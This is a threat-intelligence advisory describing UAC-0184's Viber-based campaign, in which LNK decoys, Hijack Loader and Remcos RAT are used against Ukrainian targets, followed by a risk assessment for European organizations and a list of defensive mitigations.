The threat actor UAC-0184, also known as Hive0156, is a Russia-aligned cyber espionage group that has been actively targeting Ukrainian military and government entities since at least early 2024. Their latest campaign, reported in early 2026, leverages the Viber messaging platform to distribute malicious ZIP archives containing Windows shortcut (LNK) files disguised as official Microsoft Word and Excel documents. When victims open these LNK files, they serve as decoys while silently executing a PowerShell script that downloads a secondary ZIP archive named "smoothieks.zip" from a remote server. This archive contains the Hijack Loader malware, which is reconstructed and executed in memory through a multi-stage process employing advanced evasion techniques such as DLL side-loading and module stomping to bypass security tools. Hijack Loader scans the victim environment for installed security software by calculating CRC32 hashes of known antivirus products (including Kaspersky, Avast, BitDefender, AVG, Emsisoft, Webroot, and Microsoft) to tailor evasion strategies. The loader establishes persistence via scheduled tasks and subverts static signature detection before injecting the Remcos Remote Access Trojan (RAT) into the legitimate process "chime.exe." Remcos RAT provides attackers with extensive control over the infected system, enabling execution of arbitrary payloads, data exfiltration, and monitoring. This campaign marks an evolution in UAC-0184’s tactics, expanding from phishing emails to leveraging popular encrypted messaging apps like Viber, Signal, and Telegram as malware delivery vectors. The use of LNK files as decoys and in-memory execution techniques increases stealth and complicates detection. Although no known exploits are publicly reported, the threat actor’s continued high-intensity intelligence gathering and espionage activities pose significant risks to targeted organizations.

For European organizations, especially those with strategic or operational ties to Ukraine or involved in defense, intelligence, or government sectors, this threat represents a significant espionage risk. The use of widely adopted security products targeted by the malware’s evasion techniques means that even well-defended environments could be compromised if users are tricked into opening malicious files. The stealthy nature of the attack, including in-memory execution and process injection, complicates detection and incident response. Compromise could lead to unauthorized access to sensitive information, disruption of operations, and potential lateral movement within networks. Additionally, the use of popular messaging platforms as delivery vectors raises concerns about supply chain and communication channel security. European organizations involved in supporting Ukraine or sharing intelligence may be secondary targets or collateral victims. The campaign underscores the need for vigilance against sophisticated social engineering and multi-stage malware delivery methods.

European organizations should implement targeted mitigations beyond generic advice: 1) Enforce strict policies to block or scrutinize ZIP archives and LNK files received via messaging apps, especially from unverified or unexpected sources. 2) Deploy advanced endpoint detection and response (EDR) solutions capable of detecting in-memory execution, DLL side-loading, and process injection behaviors. 3) Monitor scheduled tasks and unusual persistence mechanisms for unauthorized entries. 4) Harden PowerShell usage by enabling constrained language mode and logging all script executions for anomaly detection. 5) Educate users on the risks of opening files from messaging platforms and implement multi-factor verification for sensitive communications. 6) Regularly update and patch all security products and operating systems to reduce exploitation windows. 7) Employ network segmentation and strict egress filtering to limit malware command and control communications. 8) Use threat intelligence feeds to detect indicators of compromise related to UAC-0184 and Remcos RAT. 9) Conduct regular threat hunting exercises focusing on behaviors associated with this attack chain. 10) Collaborate with national cybersecurity agencies for timely alerts and incident response support.